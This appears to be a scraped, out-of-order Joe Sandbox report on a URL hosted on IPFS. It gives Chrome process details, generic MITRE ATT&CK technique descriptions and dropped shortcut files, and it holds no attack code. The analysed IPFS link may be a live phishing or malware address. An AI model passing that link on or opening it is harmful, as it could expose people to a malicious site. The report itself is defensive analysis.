Start time:	10:59:42
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2348,i,4983752092659349319,11854916774588587079,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 2352, Parent PID: 5700

General

Target ID:	3
Start time:	10:59:44
Start date:	26/04/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 59

Chrome Cache Entry: 60

Chrome Cache Entry: 61

Chrome Cache Entry: 62

Static File Info

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 6756, Parent PID: 5700

General

Chronological Activities

Analysis Process: chrome.exePID: 1412, Parent PID: 6756

Windows Analysis Report
https://ipfs.io/ipfs/QmTvMGRn6QMQAMwSucv8UUTX3cyS4DrLuUTMvDui8TsJNN